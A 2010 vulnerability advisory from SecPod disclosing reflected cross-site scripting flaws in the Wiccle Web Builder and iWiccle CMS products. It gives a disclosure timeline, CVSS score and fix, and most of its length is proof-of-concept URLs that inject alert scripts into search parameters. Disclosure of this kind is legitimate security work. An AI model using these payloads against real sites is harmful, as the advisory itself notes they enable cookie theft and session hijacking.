Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24972
HistoryOct 24, 2010 - 12:00 a.m.

Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple XSS Vulnerabilities

2010-10-2400:00:00
vulners.com
35

##############################################################################
Wiccle Web Builder CMS and iWiccle CMS Community Builder
Multiple Cross-Site
Scripting Vulnerability.

SecPod Technologies (www.secpod.com)
Author Veerendra G.G
###############################################################################

SecPod ID: 1005
09/07/2010 Issue Discovered

09/10/2010 Vendor Notified

09/13/2010 Vendor Confirmed

09/14/2010 Fix Available

Class: Cross-Site Scripting
Severity: Medium

Overview:

Wiccle Web Builder CMS and iWiccle CMS Community Builder
is prone to multiple
Cross-Site Scripting Vulnerabilities.

Technical Description:

Wiccle Web Builder CMS and iWiccle CMS Community Builder
is prone to multiple
Cross-Site vulnerabilities because it fails to properly
sanitize user-supplied input.

NOTE: Vulnerability is exploitable, when
magic_quotes_gpc is Off (magic_quotes_gpc = Off)

1) Input passed via the 'member_city' parameter to
'index.php' when 'module' is
set to 'dating' and 'show' is set to 'member_search'
is not properly verified
before it is returned to the user.

NOTE: This vulnerability exists only in Wiccle Web
Builder CMS

POC:
*
http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

2) Input passed via the 'post_name', 'post_text',
'post_tag', 'post_member_name'
parameter to 'index.php' when 'module' is set to
various (Auctions, Audio etc.,)
options and 'show' is set to 'post_search' is not
properly verified before
it is returned to the user.

NOTE: This vulnerability exists in both the products
(Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
*
http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

3) Input passed via the 'member_username', 'member_tags'
parameter to 'index.php'
when 'module' is set to 'members' and 'show' is set
to 'member_search' is not
properly verified before it is returned to the user.

NOTE: This vulnerability exists in both the products
(Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
*
http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

These can be exploited to execute arbitrary HTML and
script code in a user's
browser session in the context of a vulnerable site.
This may allow an attacker
to steal cookie-based authentication and launch further
attacks.

The exploit has been tested in Wiccle Web Builder CMS
2.0 (wwb_101.zip) and
iWiccle CMS Community Builder (iwiccle_1211.zip)

Impact:

Successful exploitation could allow an attacker to
execute arbitrary HTML and
script code in a user's browser session in the context
of a vulnerable site.

Affected Software:

Wiccle Web Builder CMS 2.0 (wwb_101.zip)
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)

References:

http://www.wiccle.com/
http://secpod.org/blog/?p=130
http://wiccle.com/download/wwb_101.zip
http://wiccle.com/download/iwiccle_1211.zip
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas

Proof of Concepts:

NOTE: It is exploitable, when magic_quotes_gpc is Off
(magic_quotes_gpc = Off)

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

Other POC's:

http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>

Workaround:

Not available

Solution:

iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas

Risk Factor:

CVSS Score Report
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = MEDIUM
    AUTHENTICATION         = NONE
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = PARTIAL
    AVAILABILITY_IMPACT    = NONE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 4.3 &#40;MEDIUM&#41;

(AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:

Veerendra G.G of SecPod Technologies has been credited
with the discovery of
this vulnerability.